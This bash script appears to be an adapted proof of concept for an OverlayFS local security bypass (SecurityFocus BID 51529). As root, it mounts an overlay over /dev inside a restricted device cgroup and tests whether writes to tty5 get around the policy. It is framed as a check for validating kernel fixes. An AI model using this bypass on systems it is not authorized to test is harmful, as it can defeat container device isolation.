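#!/bin/bash
# source: https://www.securityfocus.com/bid/51529/info
#
# OverlayFS is prone to a local security-bypass vulnerability.
# Attackers can exploit this issue to bypass security restrictions and
# perform unauthorized actions.
#
# What this check does:
#   1. Locates the "devices" cgroup mountpoint and creates a temporary
#      child cgroup, then moves this shell into it.
#   2. Denies all device access in that cgroup, re-allowing only mknod of
#      character device 4:5 (tty5).
#   3. Mounts an overlayfs with /dev as the lower directory.
#   4. Writes to /dev/tty5 directly (expected to be denied) and then to
#      the same node through the overlay mount (should also be denied).
#
# Reading the result: a denied direct write together with a successful
# write through the overlay means the device cgroup policy is not being
# enforced on the overlay path. Remediation is a kernel update from the
# distribution; consult the advisory linked above for fixed versions.
#
# Requires root (mounting and cgroup writes). `set -e` is intentionally
# not used: the two test writes are expected to fail.

ddir=''
ndir=''
odir=''
udir=''
mounted=0

# Undo everything created below, in reverse order, on any exit path so a
# failed run does not leave a stray mount or cgroup behind.
cleanup() {
  if [[ "$mounted" -eq 1 ]]; then
    umount -- "$odir"
  fi
  if [[ -n "$odir" ]]; then
    rmdir -- "$odir"
  fi
  if [[ -n "$udir" ]]; then
    rm -rf -- "${udir:?}"
  fi
  if [[ -n "$ndir" ]]; then
    # Move ourselves back to the root cgroup, otherwise the temporary one
    # cannot be deleted because it is still occupied (by us).
    echo $$ > "$ddir/tasks"
    rmdir -- "$ndir"
  fi
}
trap cleanup EXIT

# Field 5 of mountinfo is the mount point; take the first devices cgroup.
ddir=$(awk '/cgroup/ && /devices/ { print $5; exit }' /proc/self/mountinfo)
if [[ -z "$ddir" ]]; then
  echo "couldn't find devices cgroup mountpoint" >&2
  exit 1
fi

# Create the new cgroup.
ndir=$(mktemp -d --tmpdir="$ddir" exploit-XXXX) || { ndir=''; exit 1; }
# Create a directory onto which we mount the overlay.
odir=$(mktemp -d --tmpdir=/mnt exploit-XXXX) || { odir=''; exit 1; }
# Create the directory to be the overlay's upper dir (where changes will
# be written).
udir=$(mktemp -d --tmpdir=/tmp exploit-XXX) || { udir=''; exit 1; }

if ! mount -t overlayfs -oupperdir="$udir",lowerdir=/dev none "$odir"; then
  echo "overlayfs mount failed; nothing to test" >&2
  exit 1
fi
mounted=1

echo $$ > "$ndir/tasks"

# Deny all device actions...
echo a > "$ndir/devices.deny"
# ...but allow mknod of tty5 (c 4:5), because the node has to be created
# in the writeable overlay.
echo "c 4:5 m" > "$ndir/devices.allow"

echo "devices.list: XXXXXXXXXXXXXXX"
cat -- "$ndir/devices.list"
echo "XXXXXXXXXXXX"

# Try writing to /dev/tty5 - not allowed.
echo x > /dev/tty5
direct_rc=$?
echo "write to /dev/tty5 returned $direct_rc"

# Try writing to tty5 on the overlayfs - SHOULD not be allowed.
echo y > "$odir/tty5"
overlay_rc=$?
echo "write to $odir/tty5 returned $overlay_rc"

# Summarise for whoever is validating a kernel update.
if [[ "$direct_rc" -eq 0 ]]; then
  echo "result: direct write was not denied; cgroup policy not applied, test inconclusive"
elif [[ "$overlay_rc" -eq 0 ]]; then
  echo "result: device cgroup restriction NOT enforced through overlayfs (affected)"
else
  echo "result: device cgroup restriction enforced on both paths"
fi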